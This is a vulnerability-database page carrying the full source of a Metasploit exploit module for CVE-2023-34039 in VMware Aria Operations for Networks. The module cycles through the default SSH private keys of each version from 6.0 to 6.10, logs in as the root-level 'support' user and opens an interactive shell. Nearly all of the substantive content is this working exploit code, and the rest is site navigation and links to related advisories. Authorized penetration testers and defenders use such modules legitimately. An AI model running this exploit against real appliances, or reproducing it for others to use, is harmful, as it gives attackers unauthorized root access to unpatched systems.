Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormH00die, Harsh Jaiswal, Rahul Maini, SinSinology, metasploit.comPACKETSTORM:175320
HistoryOct 24, 2023 - 12:00 a.m.

VMWare Aria Operations For Networks SSH Private Key Exposure

2023-10-2400:00:00
h00die, Harsh Jaiswal, Rahul Maini, SinSinology, metasploit.com
packetstormsecurity.com
150
vmware aria operations
networks
ssh
private key
exposure
unauthorized access

0.945 High

EPSS

Percentile

99.2%

JSON
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'net/ssh'  
require 'net/ssh/command_stream'  
  
class MetasploitModule < Msf::Exploit::Remote  
include Msf::Auxiliary::Report  
include Msf::Exploit::Remote::SSH  
  
Rank = ExcellentRanking  
  
def initialize(info = {})  
super(  
update_info(  
info,  
{  
'Name' => 'VMWare Aria Operations for Networks (vRealize Network Insight) SSH Private Key Exposure',  
'Description' => %q{  
VMWare Aria Operations for Networks (vRealize Network Insight) versions 6.0.0 through 6.10.0  
do not randomize the SSH keys on virtual machine initialization. Since the key is easily  
retrievable, an attacker can use it to gain unauthorized remote access as the "support" (root) user.  
},  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Privileged' => true,  
'Targets' => [  
[ '6.0_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.0.0_platform') } ],  
[ '6.0_proxy', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.0.0_proxy') } ],  
[ '6.1_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.1.0_platform') } ],  
[ '6.1_proxy', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.1.0_proxy') } ],  
[ '6.2_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.2.0_collector') } ],  
[ '6.2_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.2.0_platform') } ],  
[ '6.3_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.3.0_collector') } ],  
[ '6.3_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.3.0_platform') } ],  
[ '6.4_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.4.0_collector') } ],  
[ '6.4_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.4.0_platform') } ],  
[ '6.5_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.5.0_collector') } ],  
[ '6.5_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.5.0_platform') } ],  
[ '6.6_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.6.0_collector') } ],  
[ '6.6_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.6.0_platform') } ],  
[ '6.7_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.7.0_collector') } ],  
[ '6.7_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.7.0_platform') } ],  
[ '6.8_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.8.0_collector') } ],  
[ '6.8_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.8.0_platform') } ],  
[ '6.9_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.9.0_collector') } ],  
[ '6.9_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.9.0_platform') } ],  
[ '6.10_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.10.0_collector') } ],  
[ '6.10_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.10.0_platform') } ],  
[  
'All', {} # built later  
],  
],  
'Payload' => {  
'Compat' => {  
'PayloadType' => 'cmd_interact',  
'ConnectionType' => 'find'  
}  
},  
'Author' => [  
'h00die', # MSF module  
'SinSinology', # PoC  
'Harsh Jaiswal (@rootxharsh)', # Discovery  
'Rahul Maini (@iamnoooob)' # Discovery  
],  
'License' => MSF_LICENSE,  
'References' => [  
['CVE', '2023-34039'],  
['URL', 'https://github.com/sinsinology/CVE-2023-34039'],  
['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/'],  
['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0018.html'],  
],  
'DisclosureDate' => '2023-08-29',  
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },  
'DefaultTarget' => 22,  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS]  
}  
}  
)  
)  
  
register_options(  
[  
# Since we don't include Tcp, we have to register this manually  
Opt::RHOST(),  
Opt::RPORT(22)  
], self.class  
)  
  
register_advanced_options(  
[  
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),  
OptBool.new('STOP_ON_SUCCESS', [ false, 'Stop on successful login', true]),  
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time in seconds to negotiate a SSH session', 30])  
]  
)  
end  
  
# helper methods that normally come from Tcp  
def rhost  
datastore['RHOST']  
end  
  
def rport  
datastore['RPORT']  
end  
  
def do_login(user, key_data)  
opt_hash = ssh_client_defaults.merge({  
auth_methods: ['publickey'],  
port: rport,  
key_data: [ key_data ]  
})  
opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG']  
begin  
ssh_socket = nil  
::Timeout.timeout(datastore['SSH_TIMEOUT']) do  
ssh_socket = Net::SSH.start(rhost, user, opt_hash)  
end  
rescue Rex::ConnectionError  
print_error "#{rhost}:#{rport} SSH - Unable to connect"  
return nil  
rescue Net::SSH::Disconnect, ::EOFError  
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"  
return nil  
rescue ::Timeout::Error  
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"  
return nil  
rescue Net::SSH::AuthenticationFailed  
print_error "#{rhost}:#{rport} SSH - Failed authentication"  
return nil  
rescue Net::SSH::Exception => e  
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"  
return nil  
end  
  
if ssh_socket  
# Create a new session from the socket, then close it.  
conn = Net::SSH::CommandStream.new(ssh_socket)  
ssh_socket = nil  
  
return conn  
end  
nil  
end  
  
def exploit  
if target.name == 'All'  
keys = targets.filter_map { |t| t.opts['key'] if t.name != 'All' }  
else  
keys = [target.opts['key']]  
end  
  
keys.each do |key|  
vprint_status("Attempting key: #{key}")  
key_data = File.read(key, mode: 'rb')  
conn = do_login('support', key_data)  
next unless conn  
  
print_good "#{rhost}:#{rport} - Successful login via support@#{rhost}:#{rport} and ssh key: #{key}"  
handler(conn.lsock)  
break if datastore['STOP_ON_SUCCESS']  
end  
end  
end  
`

Related

saint 2
githubexploit 3
prion 1
zdt 1
cvelist 1
nvd 1
metasploit 1
cve 1
nessus 2
vmware 1
hivepro 1
thn 2
saint
saint
VMware Aria Operations for Networks default SSH key
2023-09-06 00:00:00
VMware Aria Operations for Networks default SSH key
2023-09-06 00:00:00
githubexploit
githubexploit
Exploit for Use of a Broken or Risky Cryptographic Algorithm in Vmware Aria Operations For Networks
2023-09-02 07:56:06
Exploit for Use of a Broken or Risky Cryptographic Algorithm in Vmware Aria Operations For Networks
2023-09-01 16:17:10
Exploit for Use of a Broken or Risky Cryptographic Algorithm in Vmware Aria Operations For Networks
2023-09-04 03:27:56
prion
prion
Authentication flaw
2023-08-29 18:15:00
zdt
zdt
VMWare Aria Operations For Networks SSH Private Key Exposure Exploit
2023-10-24 00:00:00
cvelist
cvelist
CVE-2023-34039
2023-08-29 17:36:18
nvd
nvd
CVE-2023-34039
2023-08-29 18:15:08
metasploit
metasploit
VMWare Aria Operations for Networks (vRealize Network Insight) SSH Private Key Exposure
2023-10-16 17:06:17
cve
cve
CVE-2023-34039
2023-08-29 18:15:08
nessus
nessus
VMWare Aria Operations for Networks Authentication Bypass (CVE-2023-34039) (Direct Check)
2023-10-17 00:00:00
VMWare Aria Operations for Networks Multiple Vulnerabilities (VMSA-2023-0018)
2023-08-31 00:00:00
vmware
vmware
VMware Aria Operations for Networks updates address multiple vulnerabilities. (CVE-2023-34039, CVE-2023-20890)
2023-08-29 00:00:00
hivepro
hivepro
A Critical Vulnerability uncovered in VMware Aria Operations for Networks
2023-09-01 08:41:35
thn
thn
Critical Vulnerability Alert: VMware Aria Operations Networks at Risk from Remote Attacks
2023-08-30 06:57:00
PoC Exploit Released for Critical VMware Aria's SSH Auth Bypass Vulnerability
2023-09-03 04:42:00

0.945 High

EPSS

Percentile

99.2%

JSON
Related for PACKETSTORM:175320
saint2githubexploit3prion1zdt1cvelist1nvd1metasploit1cve1nessus2vmware1hivepro1thn2